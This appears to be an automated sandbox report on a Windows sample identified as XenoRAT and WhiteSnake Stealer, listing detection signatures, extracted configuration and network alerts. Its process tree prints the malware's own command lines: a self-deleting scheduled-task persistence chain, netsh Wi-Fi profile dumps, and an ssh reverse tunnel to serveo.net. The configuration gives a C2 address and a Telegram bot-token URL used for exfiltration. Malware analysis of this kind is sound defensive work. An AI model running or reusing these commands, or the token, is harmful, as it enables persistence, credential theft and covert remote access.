Edit tour
Windows
Analysis Report
0LpFv1haTA.exe
Overview
General Information
Sample name: | 0LpFv1haTA.exerenamed because original name is a hash value |
Original sample name: | 1bafb4856a31ae27271fbd2ee1574a4f.exe |
Analysis ID: | 1520806 |
MD5: | 1bafb4856a31ae27271fbd2ee1574a4f |
SHA1: | b8b3649d959524df2c4e8a94434fc0de90f95005 |
SHA256: | 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff |
Tags: | exeXenoRATuser-abuse_ch |
Infos: | |
Detection
WhiteSnake Stealer, XenoRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
- 0LpFv1haTA.exe (PID: 5948 cmdline:
"C:\Users\ user\Deskt op\0LpFv1h aTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F) - cmd.exe (PID: 5784 cmdline:
"C:\Window s\System32 \cmd.exe" /C chcp 65 001 && tim eout /t 3 > NUL && s chtasks /c reate /tn "0LpFv1haT A" /sc MIN UTE /tr "C :\Users\us er\AppData \Local\Sta rlabs\0LpF v1haTA.exe " /rl HIGH EST /f && DEL /F /S /Q /A "C:\ Users\user \Desktop\0 LpFv1haTA. exe" &&STA RT "" "C:\ Users\user \AppData\L ocal\Starl abs\0LpFv1 haTA.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 4996 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - timeout.exe (PID: 6104 cmdline:
timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6) - schtasks.exe (PID: 4288 cmdline:
schtasks / create /tn "0LpFv1ha TA" /sc MI NUTE /tr " C:\Users\u ser\AppDat a\Local\St arlabs\0Lp Fv1haTA.ex e" /rl HIG HEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2) - 0LpFv1haTA.exe (PID: 1964 cmdline:
"C:\Users\ user\AppDa ta\Local\S tarlabs\0L pFv1haTA.e xe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F) - cmd.exe (PID: 7164 cmdline:
"cmd.exe" /c chcp 65 001 && net sh wlan sh ow profile s|findstr /R /C:"[ ] :[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 2284 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - netsh.exe (PID: 7096 cmdline:
netsh wlan show prof iles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - findstr.exe (PID: 5996 cmdline:
findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 5856 cmdline:
"cmd.exe" /c chcp 65 001 && net sh wlan sh ow network s mode=bss id | finds tr "SSID B SSID Signa l" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 2684 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - netsh.exe (PID: 2952 cmdline:
netsh wlan show netw orks mode= bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - findstr.exe (PID: 1976 cmdline:
findstr "S SID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - ssh.exe (PID: 5856 cmdline:
"ssh.exe" -o "Strict HostKeyChe cking=no" -R 80:127. 0.0.1:7634 serveo.ne t MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) - conhost.exe (PID: 7124 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - manager.exe (PID: 8056 cmdline:
"C:\Users\ user\AppDa ta\Roaming \manager.e xe" MD5: DA118F70D089DABFAB1B43B4CD87DB65) - manager.exe (PID: 8128 cmdline:
"C:\Users\ user\AppDa ta\Roaming \XenoManag er\manager .exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65) - schtasks.exe (PID: 7184 cmdline:
"schtasks. exe" /Crea te /TN "ms window" /X ML "C:\Use rs\user\Ap pData\Loca l\Temp\tmp 4A67.tmp" /F MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 2860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 0LpFv1haTA.exe (PID: 5500 cmdline:
C:\Users\u ser\AppDat a\Local\St arlabs\0Lp Fv1haTA.ex e MD5: 1BAFB4856A31AE27271FBD2EE1574A4F) - cmd.exe (PID: 3852 cmdline:
"cmd.exe" /c chcp 65 001 && net sh wlan sh ow profile s|findstr /R /C:"[ ] :[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6196 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5968 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - netsh.exe (PID: 744 cmdline:
netsh wlan show prof iles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - findstr.exe (PID: 1520 cmdline:
findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 5300 cmdline:
"cmd.exe" /c chcp 65 001 && net sh wlan sh ow network s mode=bss id | finds tr "SSID B SSID Signa l" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5260 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - netsh.exe (PID: 5616 cmdline:
netsh wlan show netw orks mode= bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - findstr.exe (PID: 6196 cmdline:
findstr "S SID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - ssh.exe (PID: 7232 cmdline:
"ssh.exe" -o "Strict HostKeyChe cking=no" -R 80:127. 0.0.1:7634 serveo.ne t MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) - conhost.exe (PID: 7240 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WerFault.exe (PID: 7488 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 5 500 -s 364 4 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
- 0LpFv1haTA.exe (PID: 7992 cmdline:
C:\Users\u ser\AppDat a\Local\St arlabs\0Lp Fv1haTA.ex e MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- manager.exe (PID: 2108 cmdline:
C:\Users\u ser\AppDat a\Roaming\ XenoManage r\manager. exe MD5: DA118F70D089DABFAB1B43B4CD87DB65)
- 0LpFv1haTA.exe (PID: 7388 cmdline:
C:\Users\u ser\AppDat a\Local\St arlabs\0Lp Fv1haTA.ex e MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- 0LpFv1haTA.exe (PID: 174540 cmdline:
C:\Users\u ser\AppDat a\Local\St arlabs\0Lp Fv1haTA.ex e MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- 0LpFv1haTA.exe (PID: 337928 cmdline:
C:\Users\u ser\AppDat a\Local\St arlabs\0Lp Fv1haTA.ex e MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XenoRAT | No Attribution |
{"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
{"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_WhiteSnake | Yara detected WhiteSnake Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-27T23:28:02.050959+0200 | 2045869 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-27T23:27:14.915873+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP |
2024-09-27T23:27:16.303924+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-27T23:27:14.861894+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP |
2024-09-27T23:27:16.252698+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-27T23:27:37.244014+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49729 | 167.99.138.249 | 8080 | TCP |
2024-09-27T23:27:58.620125+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49737 | 206.189.109.146 | 80 | TCP |
2024-09-27T23:27:59.523921+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49738 | 45.82.65.63 | 80 | TCP |
2024-09-27T23:28:00.420730+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49739 | 188.120.242.78 | 8817 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | Avira: |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 7_2_00007FF848F187D1 | |
Source: | Code function: | 13_2_00007FF848F187C1 | |
Source: | Code function: | 13_2_00007FF848F1890D |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00007FF848F05453 | |
Source: | Code function: | 7_2_00007FF848F1CD0F | |
Source: | Code function: | 7_2_00007FF848F165B0 | |
Source: | Code function: | 7_2_00007FF848F1E0C4 | |
Source: | Code function: | 7_2_00007FF848F1BB98 | |
Source: | Code function: | 7_2_00007FF848F216DF | |
Source: | Code function: | 7_2_00007FF848F1D59F | |
Source: | Code function: | 7_2_00007FF848F20459 | |
Source: | Code function: | 7_2_00007FF848F14894 | |
Source: | Code function: | 7_2_00007FF848F148F3 | |
Source: | Code function: | 7_2_00007FF848F1E37C | |
Source: | Code function: | 13_2_00007FF848F1BAE2 | |
Source: | Code function: | 13_2_00007FF848F2C135 | |
Source: | Code function: | 13_2_00007FF848F14141 | |
Source: | Code function: | 13_2_00007FF848F1615E | |
Source: | Code function: | 13_2_00007FF848F1B9ED | |
Source: | Code function: | 13_2_00007FF848F2E49A | |
Source: | Code function: | 13_2_00007FF848F1CC9E | |
Source: | Code function: | 13_2_00007FF848F1CC9E | |
Source: | Code function: | 13_2_00007FF848F21E8E | |
Source: | Code function: | 13_2_00007FF848F1DD70 | |
Source: | Code function: | 13_2_00007FF848F1DD70 | |
Source: | Code function: | 13_2_00007FF848F210BE | |
Source: | Code function: | 13_2_00007FF848F14F54 | |
Source: | Code function: | 13_2_00007FF848F232C9 | |
Source: | Code function: | 13_2_00007FF848F1D58F | |
Source: | Code function: | 13_2_00007FF848F17839 | |
Source: | Code function: | 13_2_00007FF848F14894 | |
Source: | Code function: | 13_2_00007FF848F1FFBF | |
Source: | Code function: | 40_2_00007FF848F26DD0 | |
Source: | Code function: | 40_2_00007FF848F27858 | |
Source: | Code function: | 40_2_00007FF848F24894 | |
Source: | Code function: | 40_2_00007FF848F248F3 | |
Source: | Code function: | 40_2_00007FF848F25792 | |
Source: | Code function: | 40_2_00007FF848F29BF6 | |
Source: | Code function: | 41_2_023B0B88 | |
Source: | Code function: | 42_2_03220B88 | |
Source: | Code function: | 42_2_03220B78 | |
Source: | Code function: | 45_2_00ED0B88 | |
Source: | Code function: | 46_2_00007FF848F34141 | |
Source: | Code function: | 46_2_00007FF848F34F54 | |
Source: | Code function: | 46_2_00007FF848F34894 | |
Source: | Code function: | 47_2_00007FF848F166FB | |
Source: | Code function: | 47_2_00007FF848F14141 | |
Source: | Code function: | 47_2_00007FF848F14F54 | |
Source: | Code function: | 47_2_00007FF848F14894 | |
Source: | Code function: | 47_2_00007FF848F19D36 | |
Source: | Code function: | 47_2_00007FF848F17979 | |
Source: | Code function: | 48_2_00007FF848F16F09 | |
Source: | Code function: | 48_2_00007FF848F14894 | |
Source: | Code function: | 48_2_00007FF848F148F3 | |
Source: | Code function: | 48_2_00007FF848F19D36 | |
Source: | Code function: | 48_2_00007FF848F17979 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | DNS query: |
Source: | File source: | ||
Source: | File source: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | HTTP traffic detected: |